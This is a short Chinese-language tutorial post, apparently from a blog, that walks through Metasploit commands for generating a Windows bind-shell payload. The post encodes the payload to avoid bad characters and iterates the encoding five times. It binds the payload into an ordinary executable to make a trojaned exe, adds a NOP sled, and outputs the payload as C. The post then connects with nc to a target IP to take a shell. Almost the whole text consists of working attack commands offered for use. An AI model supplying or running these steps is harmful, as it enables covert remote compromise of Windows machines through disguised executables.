生成payload
# 查看所有payloads
show payloads
# 查看windows可用(输完按两下回车)
use payload/windows/
# 使用绑定端口payload
msf5 > use payload/windows/shell_bind_tcp
# 查看payload编码,里面可能含有“坏字符”
msf5 payload(windows/shell_bind_tcp) > generate
# 对坏字符编码(默认自动选择一个最合适的encoder,也可以手动指定encoder)
msf5 payload(windows/shell_bind_tcp) > generate -b '\x00\x0a\x0d'
# 查看encoders
msf5 payload(windows/shell_bind_tcp) > show encoders
# 指定某一个encoder
msf5 payload(windows/shell_bind_tcp) > generate -e x86/fnstenv_mov
# 将payload加密5次(-i)生成exe格式(-t)并与正常的exe程序绑定(-x),生成到指定目录(-f)
msf5 payload(windows/shell_bind_tcp) > generate -b '\x00\x0a\x0d' -t exe -i 5 -k -x /root/Desktop/normal.exe -f /root/Desktop/normal_add_payload.exe
# 当目标主机运行带payload的程序后,目标主机4444端口将会被开放,此时就可以使用nc直接获取目标主机shell
nc 192.168.172.133 4444
# 给ShellCode前面加Nop(当EIP寄存器指向Nop时,会无操作并向下执行,一直执行到ShellCode为止)
msf5 payload(windows/shell_bind_tcp) > generate -n 14
# 生成不同语言的payload,默认为Ruby。(如生成c语言payload)
msf5 payload(windows/shell_bind_tcp) > generate -f c
版权声明:本文为qq_44874645原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。